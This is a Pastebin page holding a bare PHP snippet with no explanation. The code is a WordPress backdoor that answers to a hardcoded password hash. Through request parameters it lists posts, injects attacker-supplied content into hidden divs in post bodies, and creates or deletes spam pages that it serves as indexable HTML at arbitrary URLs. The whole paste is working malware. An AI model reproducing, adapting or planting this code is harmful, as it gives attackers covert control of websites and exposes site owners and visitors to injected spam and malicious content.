Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '5f4dcc3b5aa765d61d8327deb882cf99'))
- {
- switch ($_REQUEST['action'])
- {
- case 'get_all_links';
- foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
- {
- $data['code'] = '';
- if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
- {
- $data['code'] = $_[1];
- }
- print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
- }
- break;
- case 'set_id_links';
- if (isset($_REQUEST['data']))
- {
- $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
- $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
- if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
- if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
- {
- print "true";
- }
- }
- break;
- case 'create_page';
- if (isset($_REQUEST['remove_page']))
- {
- if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
- {
- print "true";
- }
- }
- elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
- {
- if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
- {
- print "true";
- }
- }
- break;
- default: print "ERROR_WP_ACTION WP_URL_CD";
- }
- die("");
- }
- if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
- {
- $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
- if ($data -> full_content)
- {
- print stripslashes($data -> content);
- }
- else
- {
- print '<!DOCTYPE html>';
- print '<html ';
- language_attributes();
- print ' class="no-js">';
- print '<head>';
- print '<title>'.stripslashes($data -> title).'</title>';
- print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
- print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
- print '<meta name="robots" content="index, follow" />';
- print '<meta charset="';
- bloginfo( 'charset' );
- print '" />';
- print '<meta name="viewport" content="width=device-width">';
- print '<link rel="profile" href="http://gmpg.org/xfn/11">';
- print '<link rel="pingback" href="';
- bloginfo( 'pingback_url' );
- print '">';
- wp_head();
- print '</head>';
- print '<body>';
- print '<div id="content" class="site-content">';
- print stripslashes($data -> content);
- get_search_form();
- get_sidebar();
- get_footer();
- }
- exit;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement